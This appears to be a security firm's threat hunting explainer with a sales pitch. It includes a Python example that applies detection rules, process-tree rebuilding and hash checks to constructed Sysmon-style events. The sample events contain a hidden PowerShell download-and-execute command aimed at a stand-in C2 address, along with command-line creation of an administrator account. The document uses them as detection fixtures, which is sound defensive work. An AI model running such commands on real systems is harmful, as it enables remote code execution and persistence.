Threat Hunting is the term for the proactive approach to cyber security: finding, identifying and understanding the threats and malicious activity already inside your network. Hacking tools and malware evolve constantly, but the steps of the cyber kill chain change very little, and it is the evidence left behind by each of those steps that lets threat hunters detect intruders in their network more reliably.
Threat Hunting brings logs, packet captures, endpoint telemetry and threat intelligence feeds together in one security analytics platform, so that specially trained analysts can run targeted investigations that take into account the unique circumstances and risk profile of an organisation.
In a typical hunt, the security analytics platform highlights suspicious events and devices, much as a SIEM or SOC does today. Suspicion can be raised by a number of indicators: connections to known Command and Control (C2) infrastructure; unusual user activity, such as creating a new administrator account with command line tools; or unusual system activity, such as Internet Explorer starting a PowerShell or command shell.
The threat hunter then investigates the affected devices. With packet captures and endpoint forensic data, the hunter can examine the running processes (and compare them against known good copies), the hashes of the binaries on disk, the process tree, and the content of traffic to and from the suspect machines. Even when the attacker uses single-use malware and takes great care to stay stealthy, this examination is likely to surface evidence that the device has been compromised.
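The two passages above, the triage indicators and the follow-up investigation, as an added example that is not part of the Content Security/RSA series. It runs three rules over constructed Sysmon-style process-creation and network-connection records (Internet Explorer spawning a shell, an administrator created with `net`, and traffic to an address on a C2 list), then rebuilds the process tree for a flagged host and compares the hash of each executable against a known-good set. The hostnames, PIDs, command lines, the 203.0.113.45 C2 address and the "known-good" file bytes are all constructed for illustration; on a real platform the hashes would come from a golden image or vendor catalogue and the events from your EDR or Sysmon pipeline.

```python
import hashlib
from collections import defaultdict

# Constructed threat-intel entry: a hypothetical known C2 address.
C2_ADDRS = {"203.0.113.45"}

# Constructed "known-good" binary contents, keyed by image basename. In
# practice the hashes come from a golden image or vendor catalogue.
KNOWN_GOOD_BYTES = {
    "explorer.exe": b"legit explorer build",
    "iexplore.exe": b"legit iexplore build",
    "powershell.exe": b"legit powershell build",
    "cmd.exe": b"legit cmd build",
    "net.exe": b"legit net build",
}
KNOWN_GOOD = {n: hashlib.sha256(b).hexdigest() for n, b in KNOWN_GOOD_BYTES.items()}

# Constructed Sysmon Event ID 1 (process create) style records. image_bytes
# stands in for the executable as collected from disk for hash comparison.
PROC_EVENTS = [
    dict(host="ws01", pid=880, ppid=600, image=r"C:\Windows\explorer.exe", cmd="explorer.exe", image_bytes=KNOWN_GOOD_BYTES["explorer.exe"]),
    dict(host="ws01", pid=4100, ppid=880, image=r"C:\Program Files\Internet Explorer\iexplore.exe", cmd="iexplore.exe", image_bytes=KNOWN_GOOD_BYTES["iexplore.exe"]),
    dict(host="ws01", pid=4212, ppid=4100, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         cmd="powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://203.0.113.45/a'))",
         image_bytes=KNOWN_GOOD_BYTES["powershell.exe"]),
    dict(host="ws01", pid=4300, ppid=4212, image=r"C:\Windows\System32\cmd.exe", cmd="cmd.exe /c net user svc_backup P@ss /add", image_bytes=KNOWN_GOOD_BYTES["cmd.exe"]),
    dict(host="ws01", pid=4310, ppid=4300, image=r"C:\Windows\System32\net.exe", cmd="net localgroup administrators svc_backup /add", image_bytes=KNOWN_GOOD_BYTES["net.exe"]),
    # A single-use dropper masquerading as svchost.exe outside System32.
    dict(host="ws01", pid=4400, ppid=4212, image=r"C:\Users\Public\svchost.exe", cmd="svchost.exe", image_bytes=b"single-use dropper"),
    dict(host="ws02", pid=2000, ppid=600, image=r"C:\Windows\explorer.exe", cmd="explorer.exe", image_bytes=KNOWN_GOOD_BYTES["explorer.exe"]),
    dict(host="ws02", pid=2100, ppid=2000, image=r"C:\Windows\System32\cmd.exe", cmd="cmd.exe /c dir", image_bytes=KNOWN_GOOD_BYTES["cmd.exe"]),
]

# Constructed Sysmon Event ID 3 (network connect) style records.
NET_EVENTS = [
    dict(host="ws01", pid=4400, dst="203.0.113.45", dport=443),
    dict(host="ws02", pid=2100, dst="192.0.2.10", dport=445),
]

BROWSERS = {"iexplore.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def hunt(proc_events, net_events, c2_addrs):
    """Apply the three indicators; return (host, pid, reason) findings."""
    by_pid = {(e["host"], e["pid"]): e for e in proc_events}
    findings = []
    for e in proc_events:
        name = basename(e["image"])
        parent = by_pid.get((e["host"], e["ppid"]))
        # 1. A browser has no business starting PowerShell or cmd.
        if parent and basename(parent["image"]) in BROWSERS and name in SHELLS:
            findings.append((e["host"], e["pid"], f"{basename(parent['image'])} spawned {name}"))
        # 2. Local account or administrator created from the command line.
        cmd = e["cmd"].lower()
        if "/add" in cmd and ("net user" in cmd or "localgroup administrators" in cmd):
            findings.append((e["host"], e["pid"], f"account change via command line: {e['cmd']}"))
    # 3. Outbound connection to an address on the C2 list.
    for n in net_events:
        if n["dst"] in c2_addrs:
            findings.append((n["host"], n["pid"], f"connection to known C2 {n['dst']}:{n['dport']}"))
    return findings


def process_tree(proc_events, host, root_pid):
    """Return the subtree under root_pid on host as indented text lines."""
    by_pid, children = {}, defaultdict(list)
    for e in proc_events:
        if e["host"] == host:
            by_pid[e["pid"]] = e
            children[e["ppid"]].append(e["pid"])
    lines = []

    def walk(pid, depth):
        e = by_pid[pid]
        lines.append("  " * depth + f"{pid} {basename(e['image'])}: {e['cmd']}")
        for child in children[pid]:
            walk(child, depth + 1)

    walk(root_pid, 0)
    return lines


def hash_mismatches(proc_events, host, known_good):
    """Executables on host whose hash differs from, or is absent from, the known-good set."""
    out = []
    for e in proc_events:
        if e["host"] != host:
            continue
        name = basename(e["image"])
        digest = hashlib.sha256(e["image_bytes"]).hexdigest()
        if known_good.get(name) != digest:
            why = "hash differs from known good" if name in known_good else "no known-good copy"
            out.append((e["pid"], e["image"], digest[:16], why))
    return out


if __name__ == "__main__":
    findings = hunt(PROC_EVENTS, NET_EVENTS, C2_ADDRS)
    for host, pid, why in findings:
        print(f"[{host}] pid {pid}: {why}")
    for host in sorted({h for h, _, _ in findings}):
        # Start the tree at the first flagged process on the host.
        first_pid = min(pid for h, pid, _ in findings if h == host)
        print("\n".join(process_tree(PROC_EVENTS, host, first_pid)))
        for pid, image, digest, why in hash_mismatches(PROC_EVENTS, host, KNOWN_GOOD):
            print(f"  pid {pid} {image} sha256={digest}... {why}")
```

The rules are deliberately narrow and keyed to parent/child relationships and command-line content rather than process names alone, which is why the ordinary `explorer.exe` to `cmd.exe` chain on ws02 is not flagged. Note that the dropper's hash is flagged not because it matches anything on a blocklist but because there is no known-good copy at all, which is the check that still works against single-use malware.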
In a recent SANS Institute survey of IT professionals, 86% of respondents said they were engaged in some kind of Threat Hunting, and almost 60% said it had improved the speed and success of their incident response. Despite this, 40% of organisations had no formal, continuous Threat Hunting procedure in place.
Although ad-hoc hunting is better than being wilfully blind, a consistent methodology, executed by experienced threat hunters on a high quality security analytics platform, is critical to detecting and evicting attackers before they can establish a foothold, find data and exfiltrate it. Threat Hunting is therefore critical for early detection of, and rapid response to, successful compromises.
The best threat hunters are usually experienced ethical hackers: intimate knowledge of the steps an attacker must perform to gain access to and control of a network, and of the evidence those steps are likely to leave, gives the threat hunter a substantial edge in dismissing false positives and investigating the most likely incidents first.
While a SIEM is the cornerstone of a solid threat hunting platform, additional tools that give visibility into network traffic and endpoint processes, together with a quality threat intelligence feed, are required for investigations to reach a relevant conclusion. Together these tools can turn a correlated event with no context into a definitive forensic analysis of what triggered the alert.
Content Security is offering customised threat hunting services, which can include anything from fully managed services, to helping you stand up the infrastructure or train your existing SOC/NOC staff to perform Threat Hunting. If you want full visibility into what malicious parties inside your network are doing (including disgruntled employees), contact Content Security for a confidential obligation free discussion.
Content Security & RSA Threat Hunting Series 1.0